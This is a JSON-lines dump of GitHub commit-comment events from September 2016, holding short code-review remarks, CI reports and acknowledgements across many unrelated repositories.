{"id":"4575016084","type":"CommitCommentEvent","actor":{"login":"WinXaito"},"repo":{"name":"firm1/zest-writer"},"payload":{"comment":{"id":19056593,"position":null,"line":null,"path":null,"commit_id":"64fb195779b544ce502a553a0644e55fd48d564d","created_at":"2016-09-16T16:24:21Z","updated_at":"2016-09-16T16:24:21Z","body":"C'est une bonne idée xD Car la les logs... c'est juste insupportable"}},"created_at":"2016-09-16T16:24:21Z"}
{"id":"4575018463","type":"CommitCommentEvent","actor":{"login":"YY3ai2ui24"},"repo":{"name":"aidma-playground/socket.io-chat"},"payload":{"comment":{"id":19056595,"position":5,"line":23,"path":"client.js","commit_id":"f66d252dfc83ca4110c3ea91eba41b97183b4dde","created_at":"2016-09-16T16:24:48Z","updated_at":"2016-09-16T16:24:48Z","body":"コールバックの場合、明示的に変数にいれないといけない言語があるのかと思っただけですので大丈夫です。\r\nおそらく、そのような書き方を好む方も多いと思います。\r\n\r\n私もJavaScriptの経験は浅いですが、関数の内容が分岐によって変わる場合に該当箇所のような実装をするパターンを見ることが多いですね。\r\n"}},"created_at":"2016-09-16T16:24:48Z"}
{"id":"4575020005","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-SSAJJALA"},"payload":{"comment":{"id":19056597,"position":63,"line":97,"path":"src/main/java/edu/madisoncollege/entjava/SantaInAnElevator.java","commit_id":"fdc2023d4470cb7bbd73bd07d990f38a1b8171a7","created_at":"2016-09-16T16:25:07Z","updated_at":"2016-09-16T16:25:07Z","body":"remember try-with-resources? How might you change this code to avoid needing the \"finally\"?"}},"created_at":"2016-09-16T16:25:07Z"}
{"id":"4575020444","type":"CommitCommentEvent","actor":{"login":"Sharpienero"},"repo":{"name":"callofduty4x/mysql"},"payload":{"comment":{"id":19056598,"position":249,"line":249,"path":"script_functions.c","commit_id":"54d105e735003879e8c088b2db9b59074a697ee0","created_at":"2016-09-16T16:25:12Z","updated_at":"2016-09-16T16:25:12Z","body":"That's because it's a custom function. What information do you need?"}},"created_at":"2016-09-16T16:25:12Z"}
{"id":"4575022127","type":"CommitCommentEvent","actor":{"login":"Tinsane"},"repo":{"name":"Tinsane/Snakes_v2"},"payload":{"comment":{"id":19056602,"position":null,"line":null,"path":null,"commit_id":"64ab94f9cb21938a715b4737fe9a52b6ce46e657","created_at":"2016-09-16T16:25:32Z","updated_at":"2016-09-16T16:25:32Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;4PwwMiwQ&#x2F;7-wall\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> написать класс Wall</a>"}},"created_at":"2016-09-16T16:25:32Z"}
{"id":"4575023674","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"MadJavaEntFall2016/santa-in-an-elevator-week-2-exercise-1-SSAJJALA"},"payload":{"comment":{"id":19056603,"position":null,"line":null,"path":null,"commit_id":"fdc2023d4470cb7bbd73bd07d990f38a1b8171a7","created_at":"2016-09-16T16:25:52Z","updated_at":"2016-09-16T16:25:52Z","body":"Overall, well done! One thing with the code coverage %. What might you do to increase the line coverage to closer to 100%?"}},"created_at":"2016-09-16T16:25:52Z"}
{"id":"4575024456","type":"CommitCommentEvent","actor":{"login":"MingcongBai"},"repo":{"name":"cthbleachbit/aosc-os-artworks"},"payload":{"comment":{"id":19056606,"position":null,"line":null,"path":null,"commit_id":"f749b3433b94f9c4736f858bc51b5199ac5fc8a7","created_at":"2016-09-16T16:26:00Z","updated_at":"2016-09-16T16:26:00Z","body":"\"It was soooo F[H]AAAAANCY —\""}},"created_at":"2016-09-16T16:26:00Z"}
{"id":"4575025656","type":"CommitCommentEvent","actor":{"login":"sils1297"},"repo":{"name":"coala/coala"},"payload":{"comment":{"id":19056609,"position":null,"line":null,"path":null,"commit_id":"890c43881f38ef8580377430f40b2d8147197325","created_at":"2016-09-16T16:26:15Z","updated_at":"2016-09-16T16:26:15Z","body":"ack"}},"created_at":"2016-09-16T16:26:15Z"}
{"id":"4575026857","type":"CommitCommentEvent","actor":{"login":"sils1297"},"repo":{"name":"coala/coala"},"payload":{"comment":{"id":19056611,"position":null,"line":null,"path":null,"commit_id":"07775a5596845630fb6c8eddffd8215b78e692f2","created_at":"2016-09-16T16:26:29Z","updated_at":"2016-09-16T16:26:29Z","body":"ack"}},"created_at":"2016-09-16T16:26:29Z"}
{"id":"4575027700","type":"CommitCommentEvent","actor":{"login":"phstc"},"repo":{"name":"yusukegoto/shoryuken"},"payload":{"comment":{"id":19056612,"position":10,"line":161,"path":"lib/shoryuken/environment_loader.rb","commit_id":"970339600528d846f7c480b93d776b869c6c6313","created_at":"2016-09-16T16:26:38Z","updated_at":"2016-09-16T16:26:38Z","body":"@yusukegoto Looks good! Another way of defining it: `Dir[File.join(required, '**', '*.rb')].each(&method(:require))`"}},"created_at":"2016-09-16T16:26:38Z"}
{"id":"4575033838","type":"CommitCommentEvent","actor":{"login":"CommanderMark"},"repo":{"name":"Regalis11/scpcb"},"payload":{"comment":{"id":19056625,"position":null,"line":null,"path":null,"commit_id":"e0cb4a4914de973e6294a125298dce8fabc9f201","created_at":"2016-09-16T16:27:51Z","updated_at":"2016-09-16T16:27:51Z","body":"I still don't see what the point of this is. It just makes the console an annoyance to re-enable each time you launch the game."}},"created_at":"2016-09-16T16:27:51Z"}
{"id":"4575034162","type":"CommitCommentEvent","actor":{"login":"Svetomech"},"repo":{"name":"Svetomech/IT_lessons"},"payload":{"comment":{"id":19056626,"position":6,"line":6,"path":"Calculator/main.cpp","commit_id":"38c2277583ec3d8ba77c4b65d6342a8055ce6112","created_at":"2016-09-16T16:27:55Z","updated_at":"2016-09-16T16:27:55Z","body":"enum class - это просто enum, каким он должен был быть (без неявных преобразований и объявления в глобальной области видимости), добавленный в C++11. Насколько мне известно, по крайней мере.\r\nПоэтому enum или enum class - ничего не меняет в данном случае. Ошибка возникает в обоих случаях (при использовании _InputType&_), можете проверить сами."}},"created_at":"2016-09-16T16:27:55Z"}
{"id":"4575034615","type":"CommitCommentEvent","actor":{"login":"phstc"},"repo":{"name":"yusukegoto/shoryuken"},"payload":{"comment":{"id":19056627,"position":10,"line":161,"path":"lib/shoryuken/environment_loader.rb","commit_id":"970339600528d846f7c480b93d776b869c6c6313","created_at":"2016-09-16T16:28:00Z","updated_at":"2016-09-16T16:28:00Z","body":"Also maybe `return unless required` to reduce the number of `if`."}},"created_at":"2016-09-16T16:28:00Z"}
{"id":"4575035677","type":"CommitCommentEvent","actor":{"login":"tomaskulich"},"repo":{"name":"vacuumlabs/react-validation"},"payload":{"comment":{"id":19056630,"position":5,"line":9,"path":"lib/validated.js","commit_id":"11f00eb3dcd0a53ff9092ad5e554029b361971b3","created_at":"2016-09-16T16:28:13Z","updated_at":"2016-09-16T16:28:13Z","body":"500 is bad default. Miso Glaus thought this was bug, because the error message was displaying and hiding all the time. Let's change it to 1000."}},"created_at":"2016-09-16T16:28:13Z"}
{"id":"4575037072","type":"CommitCommentEvent","actor":{"login":"jbenammi"},"repo":{"name":"jbenammi/Coding-Dojo-Assignments"},"payload":{"comment":{"id":19056634,"position":22,"line":22,"path":"03_queries_SQL_salika.txt","commit_id":"075d2b08bcdd2923171f5ef60c13da591a00ed5a","created_at":"2016-09-16T16:28:28Z","updated_at":"2016-09-16T16:28:28Z","body":"I am sure you noticed this in your SQL statement but missing a comma between actor_id and title"}},"created_at":"2016-09-16T16:28:28Z"}
{"id":"4575039875","type":"CommitCommentEvent","actor":{"login":"pyroninja8821"},"repo":{"name":"nhs-t10/fractal"},"payload":{"comment":{"id":19056637,"position":null,"line":null,"path":null,"commit_id":"999a5949c67c0b25244f870793df46552b8337c2","created_at":"2016-09-16T16:29:03Z","updated_at":"2016-09-16T16:29:03Z","body":"Just fyi, I made the last two commits. I forgot to change the global email so it appeared as 56awesome56."}},"created_at":"2016-09-16T16:29:03Z"}
{"id":"4575043343","type":"CommitCommentEvent","actor":{"login":"tomaskulich"},"repo":{"name":"vacuumlabs/react-validation"},"payload":{"comment":{"id":19056645,"position":8,"line":381,"path":"README.md","commit_id":"11f00eb3dcd0a53ff9092ad5e554029b361971b3","created_at":"2016-09-16T16:29:44Z","updated_at":"2016-09-16T16:29:44Z","body":"I'd mention that setting this to infinity leads to quite fine behavior."}},"created_at":"2016-09-16T16:29:44Z"}
{"id":"4575044222","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19056647,"position":null,"line":null,"path":null,"commit_id":"ac3b1f587ed3a1cc7e0816d4d0a788da8e6d3a09","created_at":"2016-09-16T16:29:54Z","updated_at":"2016-09-16T16:29:54Z","body":"This was intentional. The name should change to match the current convention. The directory was not renamed, as we need to resolve the licensing issues, or delete the directory entirely."}},"created_at":"2016-09-16T16:29:54Z"}
{"id":"4575046931","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19056654,"position":null,"line":null,"path":null,"commit_id":"e3f6d67983c073edf072aa9033718e4be2cc5a1d","created_at":"2016-09-16T16:30:26Z","updated_at":"2016-09-16T16:30:26Z","body":"Thanks!"}},"created_at":"2016-09-16T16:30:26Z"}
{"id":"4575056711","type":"CommitCommentEvent","actor":{"login":"Okalia"},"repo":{"name":"Okalia/PersonalBlog"},"payload":{"comment":{"id":19056671,"position":null,"line":null,"path":null,"commit_id":"a3a991f86ec27def4713457970f4ac48d9ea8f0a","created_at":"2016-09-16T16:32:24Z","updated_at":"2016-09-16T16:32:24Z","body":"![default](https://cloud.githubusercontent.com/assets/11776810/18593489/4980586c-7c44-11e6-8a3c-ca6405d02039.png)\r\n"}},"created_at":"2016-09-16T16:32:24Z"}
{"id":"4575058262","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19056676,"position":null,"line":null,"path":null,"commit_id":"ac3b1f587ed3a1cc7e0816d4d0a788da8e6d3a09","created_at":"2016-09-16T16:32:44Z","updated_at":"2016-09-16T16:32:44Z","body":"Although this does not need to be reverted back atm. We can do so in a separate PR which addresses that module directly."}},"created_at":"2016-09-16T16:32:44Z"}
{"id":"4575060806","type":"CommitCommentEvent","actor":{"login":"LnxPrgr3"},"repo":{"name":"LnxPrgr3/crossfeed"},"payload":{"comment":{"id":19056684,"position":null,"line":null,"path":null,"commit_id":"80d3b922b076c2d191c0d4ec63a3b6145b8c6d30","created_at":"2016-09-16T16:33:17Z","updated_at":"2016-09-16T16:33:17Z","body":"I'm guessing the problem is a comb filter effect: whenever you introduce an echo into audio, there's constructive and destructive interference with the original. This is perceived as 'thinning' of the sound. If that's what you're hearing, you can tell because the problem will disappear for sounds in the center and gets progressively worse as they move further left or right.\r\n\r\nWhen I get some free time, I can see if I can lessen this effect. Alternatively, if you haven't already tried a couple, other crossfeed designs work in normal stereo mode—their distortion may sound less strange to you."}},"created_at":"2016-09-16T16:33:17Z"}
{"id":"4575062406","type":"CommitCommentEvent","actor":{"login":"rohitmanglik"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":19056691,"position":7,"line":28,"path":"imagesFetch.py","commit_id":"e9c3ab34347a52561bb8188856c3a125ac95933f","created_at":"2016-09-16T16:33:39Z","updated_at":"2016-09-16T16:33:39Z","body":"Please revert this."}},"created_at":"2016-09-16T16:33:39Z"}
{"id":"4575063088","type":"CommitCommentEvent","actor":{"login":"ikovalisko"},"repo":{"name":"ReactiveX/RxSwift"},"payload":{"comment":{"id":19056695,"position":null,"line":null,"path":null,"commit_id":"2e8736b137064101cd98ee01523e6229825cecce","created_at":"2016-09-16T16:33:46Z","updated_at":"2016-09-16T16:33:46Z","body":"@kzaher is it possible to cherry-pick this commit onto `rxswift-2.0` branch? Useful for those who are not ready to migrate to Swift 3, but still struggling with the #874 issue."}},"created_at":"2016-09-16T16:33:46Z"}
{"id":"4575063780","type":"CommitCommentEvent","actor":{"login":"jcalfee"},"repo":{"name":"steemit/steemit.com"},"payload":{"comment":{"id":19056699,"position":null,"line":null,"path":null,"commit_id":"39ca60b5fb3c1a4a4d820232419dd9036e95ffb0","created_at":"2016-09-16T16:33:56Z","updated_at":"2016-09-16T16:33:56Z","body":"I noticed that `content.get('parent_author') === ''` is an alternative criteria that should work for this too.  What you have is working find for me though.  Only thing: change `content.toJS().depth` to `content.get('depth')`."}},"created_at":"2016-09-16T16:33:56Z"}
{"id":"4575064506","type":"CommitCommentEvent","actor":{"login":"wlynch"},"repo":{"name":"amy/shetalks"},"payload":{"comment":{"id":19056707,"position":1,"line":1,"path":"routes/router.go","commit_id":"b107abba5c1ce2ae106c7235b88543b8b8600160","created_at":"2016-09-16T16:34:05Z","updated_at":"2016-09-16T16:34:05Z","body":"Minor organizational nit: the routes and handlers packages feel like they should be closer together within the package structure. I'm not sure if this necessarily means being in the same package or one being a subpackage of the other, but having them as separate root packages felt a little strange to me,"}},"created_at":"2016-09-16T16:34:05Z"}
{"id":"4575076317","type":"CommitCommentEvent","actor":{"login":"davidaurelio"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19056732,"position":null,"line":null,"path":null,"commit_id":"970f9335a9ec75cccbbe80b45696c271cc33113c","created_at":"2016-09-16T16:36:25Z","updated_at":"2016-09-16T16:36:25Z","body":":-)"}},"created_at":"2016-09-16T16:36:25Z"}
{"id":"4575076534","type":"CommitCommentEvent","actor":{"login":"mikermcneil"},"repo":{"name":"node-machine/machine"},"payload":{"comment":{"id":19056734,"position":6,"line":22,"path":"lib/get-combined-error-stack.js","commit_id":"fc00f83e9cd8838ff4860ee5a4a798eff05f3382","created_at":"2016-09-16T16:36:29Z","updated_at":"2016-09-16T16:36:29Z","body":"To recap what we talked about yesterday, since the only way this would crash is a bug in our code, we're going to replace it with an assertion (and then if there are other places we're concerned about a breaking change from node core, we'll address that on a case by case basis in those spots-- i.e. whereever `thisStack` is parsed).  I'll follow up with a commit that takes care of the assertion and updates the comments."}},"created_at":"2016-09-16T16:36:29Z"}
{"id":"4575078736","type":"CommitCommentEvent","actor":{"login":"jjl"},"repo":{"name":"enragedginger/mpg"},"payload":{"comment":{"id":19056736,"position":null,"line":null,"path":null,"commit_id":"61375966f3f58ad693375ad3026d701cad2ebec0","created_at":"2016-09-16T16:36:56Z","updated_at":"2016-09-16T16:36:56Z","body":"Okay. Well for starters I can start moving out the conversion functions (I've just done some work that adds some, so they're not going to feel out of place.\r\n\r\nWe'd love to take a pull request if you're able to find the time, I'm just not sure under what circumstances this might be tripped and what a real fix for solution might be (and how many other circumstances it might be tripped in). Do you happen to know what the column types were that it was tripping on?"}},"created_at":"2016-09-16T16:36:56Z"}
{"id":"4575082774","type":"CommitCommentEvent","actor":{"login":"wlynch"},"repo":{"name":"amy/shetalks"},"payload":{"comment":{"id":19056745,"position":11,"line":11,"path":"mysql/database.go","commit_id":"b107abba5c1ce2ae106c7235b88543b8b8600160","created_at":"2016-09-16T16:37:48Z","updated_at":"2016-09-16T16:37:48Z","body":"I would separate your mysql init helpers from your mysql eventservice impl. Perhaps just move this directly into cmd/database/main.go since this is not something you are going to be using as a library."}},"created_at":"2016-09-16T16:37:48Z"}
{"id":"4575083571","type":"CommitCommentEvent","actor":{"login":"joaolpinho"},"repo":{"name":"Tlantic/couchbaselib"},"payload":{"comment":{"id":19056747,"position":null,"line":null,"path":null,"commit_id":"ba3cd43865979d6921a6955b552de90cf09dc425","created_at":"2016-09-16T16:37:57Z","updated_at":"2016-09-16T16:37:57Z","body":"Typo in commit title, updated to version 2.0.2"}},"created_at":"2016-09-16T16:37:57Z"}
{"id":"4575088799","type":"CommitCommentEvent","actor":{"login":"salahuddin20364seo"},"repo":{"name":"salahuddin20364seo/salahuddin20364"},"payload":{"comment":{"id":19056768,"position":null,"line":null,"path":null,"commit_id":"c38870ed3d20bdab124ad590fa40d8ee0b834003","created_at":"2016-09-16T16:39:01Z","updated_at":"2016-09-16T16:39:01Z","body":"testing"}},"created_at":"2016-09-16T16:39:01Z"}
{"id":"4575091398","type":"CommitCommentEvent","actor":{"login":"willwhite"},"repo":{"name":"Project-OSRM/osrm-backend"},"payload":{"comment":{"id":19056779,"position":null,"line":null,"path":null,"commit_id":"70ee624e5c269052f04f3ffbdf61b6672888c245","created_at":"2016-09-16T16:39:34Z","updated_at":"2016-09-16T16:39:34Z","body":"🎉 "}},"created_at":"2016-09-16T16:39:34Z"}
{"id":"4575105340","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19056818,"position":null,"line":null,"path":null,"commit_id":"9dfedb36e38a63048473e8bb5fed1581028fe9ef","created_at":"2016-09-16T16:42:28Z","updated_at":"2016-09-16T16:42:28Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2301 of 2472 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-9dfedb36e38a63048473e8bb5fed1581028fe9ef-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-9dfedb36e38a63048473e8bb5fed1581028fe9ef-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.08%25-yellow.svg)</a> \n"}},"created_at":"2016-09-16T16:42:28Z"}
{"id":"4575107126","type":"CommitCommentEvent","actor":{"login":"un1versal"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19056822,"position":30,"line":108,"path":"README.md","commit_id":"ac0db6c06d1d87e09fade31732d21f7a1af63fb9","created_at":"2016-09-16T16:42:50Z","updated_at":"2016-09-16T16:42:50Z","body":"f"}},"created_at":"2016-09-16T16:42:50Z"}
{"id":"4575113905","type":"CommitCommentEvent","actor":{"login":"safakoner"},"repo":{"name":"selcukozmumcu/ozPackages"},"payload":{"comment":{"id":19056839,"position":30,"line":21,"path":"ozWeb/python/ozWeb/imageScanLib.py","commit_id":"d55cb27b91cfef48a3f27c76d468e43105301295","created_at":"2016-09-16T16:44:16Z","updated_at":"2016-09-16T16:44:16Z","body":"you have to return None in except scope since you explicitly caught the exception, if you don't do that code would still run and hit the next line and produce another error. remember, NO PRINTS"}},"created_at":"2016-09-16T16:44:16Z"}
{"id":"4575115636","type":"CommitCommentEvent","actor":{"login":"joseluizcoe"},"repo":{"name":"kytos/website"},"payload":{"comment":{"id":19056842,"position":null,"line":null,"path":null,"commit_id":"bad9b1bea505d420aef0250e4c0e233ced18066e","created_at":"2016-09-16T16:44:40Z","updated_at":"2016-09-16T16:44:40Z","body":"At this point we have:\r\n\r\n- Napps home page:\r\n![napps](https://cloud.githubusercontent.com/assets/32010/18593811/7e78c774-7c13-11e6-9c11-6421e6dc8008.png)\r\n\r\n- Napps list page ( to search, listing and tags )\r\n![list-page](https://cloud.githubusercontent.com/assets/32010/18593826/8e03e746-7c13-11e6-82fc-138a8b0833e2.png)\r\n\r\n- Napp single page:\r\n![napp-page](https://cloud.githubusercontent.com/assets/32010/18593841/a2538166-7c13-11e6-82b0-4602c1b894d2.png)\r\n\r\n- Napp single page review tab:\r\n![napp-review](https://cloud.githubusercontent.com/assets/32010/18593858/b09c46cc-7c13-11e6-9ebc-d681fbf73802.png)\r\n\r\n\r\n"}},"created_at":"2016-09-16T16:44:40Z"}
{"id":"4575116618","type":"CommitCommentEvent","actor":{"login":"safakoner"},"repo":{"name":"selcukozmumcu/ozPackages"},"payload":{"comment":{"id":19056844,"position":41,"line":32,"path":"ozWeb/python/ozWeb/imageScanLib.py","commit_id":"d55cb27b91cfef48a3f27c76d468e43105301295","created_at":"2016-09-16T16:44:52Z","updated_at":"2016-09-16T16:44:52Z","body":"you can remove name now."}},"created_at":"2016-09-16T16:44:52Z"}
{"id":"4575116986","type":"CommitCommentEvent","actor":{"login":"jbenammi"},"repo":{"name":"jbenammi/Coding-Dojo-Assignments"},"payload":{"comment":{"id":19056845,"position":35,"line":35,"path":"03_queries_SQL_salika.txt","commit_id":"075d2b08bcdd2923171f5ef60c13da591a00ed5a","created_at":"2016-09-16T16:44:56Z","updated_at":"2016-09-16T16:44:56Z","body":"This one is very close but needs to be tweeked. Line 34 you are chaining all of these OR statements but then ending the last one with an AND.  if you run this, you will get 6 results. This is because that last AND statement is only being applied to the last OR for 459. one way you can get around this is to do an OR/AND combination for each city ID, but this gets long. Another way to handle this is to use a Where IN grouping. WHERE city.city_id IN (1,42,312, 459) AND customer.store_id = 1; This will only select from the city_id for the information listed."}},"created_at":"2016-09-16T16:44:56Z"}
{"id":"4575117056","type":"CommitCommentEvent","actor":{"login":"stefanpenner"},"repo":{"name":"mixonic/rfcs"},"payload":{"comment":{"id":19056846,"position":74,"line":272,"path":"text/0000-factoryFor.md","commit_id":"1cb5b5908b28027eacd6066e5729b43ff79efb24","created_at":"2016-09-16T16:44:57Z","updated_at":"2016-09-16T16:44:57Z","body":"such as `instanceof` checks"}},"created_at":"2016-09-16T16:44:57Z"}
{"id":"4575123543","type":"CommitCommentEvent","actor":{"login":"VaneBrain"},"repo":{"name":"Regalis11/scpcb"},"payload":{"comment":{"id":19056860,"position":null,"line":null,"path":null,"commit_id":"e0cb4a4914de973e6294a125298dce8fabc9f201","created_at":"2016-09-16T16:46:20Z","updated_at":"2016-09-16T16:46:20Z","body":"As it should be"}},"created_at":"2016-09-16T16:46:20Z"}
{"id":"4575123941","type":"CommitCommentEvent","actor":{"login":"dhermes"},"repo":{"name":"google/oauth2client"},"payload":{"comment":{"id":19056862,"position":null,"line":null,"path":null,"commit_id":"d0a60203468037364401182219cbdffcecfb6cb8","created_at":"2016-09-16T16:46:25Z","updated_at":"2016-09-16T16:46:25Z","body":"Yippee for dogma!"}},"created_at":"2016-09-16T16:46:25Z"}
{"id":"4575126614","type":"CommitCommentEvent","actor":{"login":"jangler"},"repo":{"name":"schismtracker/schismtracker"},"payload":{"comment":{"id":19056867,"position":null,"line":null,"path":null,"commit_id":"85a0996b481b32362fef6652ffc307679d82fb85","created_at":"2016-09-16T16:47:00Z","updated_at":"2016-09-16T16:47:00Z","body":"I think `else if` here makes the code more readable."}},"created_at":"2016-09-16T16:47:00Z"}
{"id":"4575130940","type":"CommitCommentEvent","actor":{"login":"majido"},"repo":{"name":"majido/animation-worklet-proposal"},"payload":{"comment":{"id":19056878,"position":null,"line":null,"path":null,"commit_id":"2619702112a744b3092417557736494018c3a9c9","created_at":"2016-09-16T16:47:54Z","updated_at":"2016-09-16T16:47:54Z","body":"lgtm"}},"created_at":"2016-09-16T16:47:54Z"}
{"id":"4575131368","type":"CommitCommentEvent","actor":{"login":"yan12125"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19056879,"position":null,"line":null,"path":null,"commit_id":"52dc8a9b3f1af7abda6652a75b906d70809c475d","created_at":"2016-09-16T16:48:00Z","updated_at":"2016-09-16T16:48:00Z","body":"Still broken for some videos:\r\n```\r\n$ youtube-dl -j \"https://www.franceinter.fr/emissions/affaires-sensibles/affaires-sensibles-07-septembre-2016\" | jq .upload_date\r\n\"2016097\"\r\n```"}},"created_at":"2016-09-16T16:48:00Z"}
{"id":"4575132981","type":"CommitCommentEvent","actor":{"login":"amy"},"repo":{"name":"amy/shetalks"},"payload":{"comment":{"id":19056886,"position":11,"line":11,"path":"mysql/eventService.go","commit_id":"b107abba5c1ce2ae106c7235b88543b8b8600160","created_at":"2016-09-16T16:48:21Z","updated_at":"2016-09-16T16:48:21Z","body":"Already done via shetalks.EventService vs. mysql.EventService "}},"created_at":"2016-09-16T16:48:21Z"}
{"id":"4575133387","type":"CommitCommentEvent","actor":{"login":"safakoner"},"repo":{"name":"selcukozmumcu/ozPackages"},"payload":{"comment":{"id":19056888,"position":7,"line":13,"path":"ozWeb/python/ozWeb/imageScanLib.py","commit_id":"d55cb27b91cfef48a3f27c76d468e43105301295","created_at":"2016-09-16T16:48:26Z","updated_at":"2016-09-16T16:48:26Z","body":"update documentation accordingly for return values,\r\nalso use the type of the objects as argument types in doc as well, str, int, float, etc."}},"created_at":"2016-09-16T16:48:26Z"}
{"id":"4575134820","type":"CommitCommentEvent","actor":{"login":"amy"},"repo":{"name":"amy/shetalks"},"payload":{"comment":{"id":19056890,"position":90,"line":90,"path":"mysql/eventService.go","commit_id":"b107abba5c1ce2ae106c7235b88543b8b8600160","created_at":"2016-09-16T16:48:46Z","updated_at":"2016-09-16T16:48:46Z","body":"Great point! Looks much nicer"}},"created_at":"2016-09-16T16:48:46Z"}
{"id":"4575143595","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.z3cform"},"payload":{"comment":{"id":19056904,"position":null,"line":null,"path":null,"commit_id":"2a690b22f49c64900fcf1e2e82b178ae86470711","created_at":"2016-09-16T16:50:34Z","updated_at":"2016-09-16T16:50:34Z","body":"@mauritsvanrees Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.app.z3cform/44/violations\n```\nplone/app/z3cform/inline_validation.py:15:1: C901 'InlineValidationView.__call__' is too complex (15)\nplone/app/z3cform/tests/test_utils.py:21:9: E731 do not assign a lambda expression, use a def\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-16T16:50:34Z"}
{"id":"4575144482","type":"CommitCommentEvent","actor":{"login":"LittleKingBee"},"repo":{"name":"LittleKingBee/The-Case-of-the-Missing-Key"},"payload":{"comment":{"id":19056908,"position":null,"line":null,"path":null,"commit_id":"c870c9eefc7d30811cd7e9ab6a189b98209a5153","created_at":"2016-09-16T16:50:46Z","updated_at":"2016-09-16T16:50:46Z","body":"Interesting, I wonder whether people will read me?"}},"created_at":"2016-09-16T16:50:46Z"}
{"id":"4575149850","type":"CommitCommentEvent","actor":{"login":"jbenammi"},"repo":{"name":"jbenammi/Coding-Dojo-Assignments"},"payload":{"comment":{"id":19056926,"position":null,"line":null,"path":null,"commit_id":"075d2b08bcdd2923171f5ef60c13da591a00ed5a","created_at":"2016-09-16T16:51:50Z","updated_at":"2016-09-16T16:51:50Z","body":"Overall good work. These are not easy but will be great help when dealing with your queries moving forward.  Suggest looking over some of the documentation to see where you might take advantage of some \"shortcuts\"  to make your quiring a bit easier. "}},"created_at":"2016-09-16T16:51:50Z"}
{"id":"4575152936","type":"CommitCommentEvent","actor":{"login":"mihailsalari"},"repo":{"name":"marmelroy/FileBrowser"},"payload":{"comment":{"id":19056932,"position":null,"line":null,"path":null,"commit_id":"ac3c3daefb716725441f2c39e2bd1fc9f3c0d5d6","created_at":"2016-09-16T16:52:30Z","updated_at":"2016-09-16T16:52:30Z","body":"Updated to Swift 3, created Xcode workspace for Sample app, please edit \"build.sh\" and prepare for cocoapods. "}},"created_at":"2016-09-16T16:52:30Z"}
{"id":"4575153377","type":"CommitCommentEvent","actor":{"login":"LittleKingBee"},"repo":{"name":"LittleKingBee/The-Case-of-the-Missing-Key"},"payload":{"comment":{"id":19056933,"position":1,"line":1,"path":"README.md","commit_id":"c870c9eefc7d30811cd7e9ab6a189b98209a5153","created_at":"2016-09-16T16:52:36Z","updated_at":"2016-09-16T16:52:36Z","body":"Sorry, guys, working title."}},"created_at":"2016-09-16T16:52:36Z"}
{"id":"4575154796","type":"CommitCommentEvent","actor":{"login":"safakoner"},"repo":{"name":"selcukozmumcu/ozPackages"},"payload":{"comment":{"id":19056936,"position":9,"line":9,"path":"ozSimpleBackup/python/ozSimpleBackup/simpleBackupCmd.py","commit_id":"c89c049449bf03e176f8edae696d651cb3583faf","created_at":"2016-09-16T16:52:54Z","updated_at":"2016-09-16T16:52:54Z","body":"update the doc"}},"created_at":"2016-09-16T16:52:54Z"}
{"id":"4575157256","type":"CommitCommentEvent","actor":{"login":"firstdoit"},"repo":{"name":"vtex/style-loader"},"payload":{"comment":{"id":19056941,"position":8,"line":26,"path":"addStyles.js","commit_id":"5b3985b0a096badf3e447151f0ff320dae89c95f","created_at":"2016-09-16T16:53:24Z","updated_at":"2016-09-16T16:53:24Z","body":"Maybe change this to `global` as we already know we're not in a client with `document`?"}},"created_at":"2016-09-16T16:53:24Z"}
{"id":"4575159214","type":"CommitCommentEvent","actor":{"login":"amy"},"repo":{"name":"amy/shetalks"},"payload":{"comment":{"id":19056944,"position":1,"line":1,"path":"routes/router.go","commit_id":"b107abba5c1ce2ae106c7235b88543b8b8600160","created_at":"2016-09-16T16:53:50Z","updated_at":"2016-09-16T16:53:50Z","body":"Definitely. Also noted this previously in the README. Will get to it after tests are up and running. Great point!"}},"created_at":"2016-09-16T16:53:50Z"}
{"id":"4575161551","type":"CommitCommentEvent","actor":{"login":"amy"},"repo":{"name":"amy/shetalks"},"payload":{"comment":{"id":19056948,"position":12,"line":12,"path":"shetalks.go","commit_id":"b107abba5c1ce2ae106c7235b88543b8b8600160","created_at":"2016-09-16T16:54:23Z","updated_at":"2016-09-16T16:54:23Z","body":"I like this suggestion! "}},"created_at":"2016-09-16T16:54:23Z"}
{"id":"4575161962","type":"CommitCommentEvent","actor":{"login":"asiaron"},"repo":{"name":"asiaron/1_typo"},"payload":{"comment":{"id":19056950,"position":null,"line":null,"path":null,"commit_id":"82b3458f05f39d30dddcbe90c6d9f706155f07e7","created_at":"2016-09-16T16:54:28Z","updated_at":"2016-09-16T16:54:28Z","body":"исправлена очепятка"}},"created_at":"2016-09-16T16:54:28Z"}
